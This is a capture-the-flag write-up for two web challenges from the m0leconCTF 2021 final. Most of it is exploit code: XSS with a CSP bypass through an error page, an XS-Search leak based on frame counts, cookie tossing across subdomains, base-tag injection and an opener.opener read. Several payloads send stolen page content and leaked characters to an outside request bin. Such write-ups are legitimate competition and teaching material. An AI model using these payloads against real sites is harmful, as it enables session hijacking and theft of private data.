
m0leconCTF 2021 final web writeup

Sorry, I only had time to write up the exploit and the scenario.

filesharing

#scenario

1. upload javascript file
2. share admin
3. xss in /play
4. bypass csp via error page
5. inject script into error page

exploit.js

// Open a same-origin window on an over-long path (4100 chars). Per the scenario above,
// the resulting error page is served without the CSP that protects the normal pages,
// so script injected into it is not blocked. Defensive takeaway: error handlers and
// framework default error pages must emit the same security headers as regular responses.
// `a` is an implicit global (no declaration).
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
    // Fixed 1 s wait for the popup to finish loading. Because the popup is same-origin,
    // the opener may rewrite its DOM: the injected <img> onerror handler reads the
    // /upload/<id> resource and forwards its text to the author's request bin.
    a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);" // NOTE(review): the trailing quote looks like a paste artifact from inlining this into an attribute

payload

https://filesharing.m0lec.one/play?xss=<script src="/upload/b56fe7aa9bac42d5b24d066807bb41a7"></script>

two in one

#scenario

1. leak the admin's telegram id via an XS-Search attack (iframe)
2. send payload to telegram bot
3. bypass SameSite=Strict and get the flag using the opener.opener trick

xsleak.html

<!DOCTYPE html>
<html>
<head>
    <title>exploit</title>
</head>
<body></body>
<script>
// Alphabet tried one position at a time by search(): digits, letters, underscore.
var chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_';
// Not referenced below; search() reads chars.length directly.
var charLen = chars.length;
// Not referenced below; search() repeats the URL literal instead.
var ENDPOINT = "https://telegrambotclient.m0lec.one/locations?search="
// Open the target search page once as a popup. `x` (an implicit global) stays a
// WindowProxy for that cross-origin window; search() re-navigates it and reads the
// few Window properties that are readable across origins (frames/length).
x = window.open('https://telegrambotclient.m0lec.one/locations?search=');
/**
 * Promise-based delay used to give the popup time to navigate.
 * @param {number} t milliseconds to wait
 * @returns {Promise<void>} resolves (with no value) after `t` ms
 */
function sleep(t) {
    return new Promise((wake) => {
        setTimeout(wake, t);
    });
}

// One step of the XS-Search loop: append the guess `chars[charCounter]` to the prefix
// recovered so far and test it against the cross-origin search page.
// @param {string} leak        prefix recovered so far
// @param {number} charCounter index into `chars` of the character to try
// Defensive takeaway: a Cross-Origin-Opener-Policy header on the search page severs the
// popup/opener relationship this relies on, and a response should not vary its frame
// count with whether a query matched private data.
async function search(leak,charCounter) {
    var curChar = chars[charCounter];
    console.log(curChar);
    // Navigate the popup to prefix+guess. The popup is cross-origin, so only the
    // cross-origin-accessible Window properties (location, frames, length, ...) are usable.
    x.location = 'https://telegrambotclient.m0lec.one/locations?search=' + leak + curChar;
    // Fixed wait for the navigation; no load event is observable cross-origin.
    await sleep(100);
    // Oracle: a non-zero frame count is treated as "the search matched". Presumably the
    // results page embeds an iframe only on a hit — confirm against the challenge source.
    if(x.window.frames.length != 0){
        // Report the confirmed prefix to the author's request bin.
        var xhr = new XMLHttpRequest();
            xhr.open('GET', 'https://enllwt2ugqrt.x.pipedream.net/?cmd='+leak + curChar, true); 
            xhr.withCredentials = true; 
            xhr.send(null);    
        console.log("leak = " + leak + curChar);
        leak += curChar

    }
    // Move to the next alphabet position (wrapping with modulo). There is no stop
    // condition, so this keeps running until the page is closed; the recursive call's
    // promise is neither awaited nor returned.
    search(leak , (charCounter +1 ) % chars.length);
}

/** Entry point: starts the character-by-character search from the already-known prefix. */
function exploit() {
    const knownPrefix = "y8ww";
    search(knownPrefix, 0);
}
// Ping the author's request bin so it is visible that the page was opened, then start.
fetch('https://enllwt2ugqrt.x.pipedream.net/?start');
exploit();
</script>
</html>

rdr.html

<!-- A slow-loading resource (the sleep=9000 query suggests a ~9 s delayed 200) keeps this
     page in a loading state while the popup below is opened; presumably this stops the
     visiting bot from closing the tab early - confirm against the bot's behaviour. -->
<img src=https://httpstat.us/200?sleep=9000>
<!-- Opens the messages page in a named window ('s') and pings the author's request bin. -->
<img src=x onerror="
       let s=window.open('https://telegrambotclient.m0lec.one/messages','s')
       fetch('https://enllwt2ugqrt.x.pipedream.net/?start=start')
       ">

/static/js/popper.min.js

// Served in place of the site's bundled popper.min.js, so it runs with the messages
// page's origin. Runs only on that page. NOTE(review): the `if` opened here is never
// closed in the listing — presumably truncated when the writeup was pasted.
if(document.location.href=="https://telegrambotclient.m0lec.one/messages"){
// Same trick as in exploit.js above: an over-long path yields an error page without CSP,
// i.e. a same-origin document whose body can be rewritten from here.
a = window.open('https://telegrambotclient.m0lec.one/' + 'x'.repeat(4100));
setTimeout(function() {
                    // The injected handler runs a timed sequence: log out of note.m0lec.one,
                    // set a fixed `session` cookie with domain=m0lec.one (any subdomain can set a
                    // parent-domain cookie, so the note app then sees this session instead of the
                    // admin's), then open note?id=2 several times from this error-page window.
                    // Defensive takeaways: prefer host-only / `__Host-` cookies so a sibling
                    // subdomain cannot overwrite the session, and note that SameSite=Strict does
                    // not protect against requests from a same-site sibling origin.
                    a.document.body.innerHTML = `<img src=x onerror="setTimeout(function(){window.open('https://note.m0lec.one/logout');},700);setTimeout(function(){ document.cookie='session=.eJwljjFuQzEMQ-_iuYMs27KUy3xIloQEBVrg_2Qqeve46MCBBPjIn3LkGde93J7nKz7K8fByK0zObJALYCSSpiqaYyMeIn1CLBECYBLLSVFFKyUs4WUdgXpdtZlxM00CaqBbgNbrBpiGcwVI4U3NGVmTjBACp7o7kmHZR15XnP9v-rbrOvN4fn_G1w6Gx1-38d7ZxI5zgOpAwDFF6kSHEMgsv2-Y5j5D.YaomgA.58rKF-PLOJEKpL0BnaaZrpFx3to; domain=m0lec.one'},1700);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},1900);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2100);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2300);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2500);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},3000)">`;
        }, 300);
// Meanwhile (at 500 ms, before the cookie is replaced at 1700 ms) navigate this window —
// the opener of the error page, hence `opener.opener` of the note?id=2 popups — to
// note?id=1, so that document is loaded under the session this page currently has.
setTimeout(function(){document.location = 'https://note.m0lec.one/note?id=1';},500);

/static/js/jquery-3.3.1.slim.min.js

// Loaded in place of the site's jQuery via the injected <base href> (see the payload
// below), so it runs on the note?id=2 popup. Walks two opener hops (popup -> error-page
// window -> the window navigated to note?id=1); that window is same-origin with this
// page, so its URL and body are readable and are posted to the author's request bin.
// Defensive takeaways: a Cross-Origin-Opener-Policy header on the note app severs this
// opener chain, and the root cause is that a <base> tag could be injected at all.
fetch('https://enllwt2ugqrt.x.pipedream.net/?aa='+opener.opener.document.location.href+'&x='+btoa(opener.opener.document.body.innerHTML))

payload

https://a.com/&gt;a&lt;/a&gt;&lt;base/href=&quot;https://ssrf.kr&quot;&gt;

report

https://ssrf.kr/rdr.html
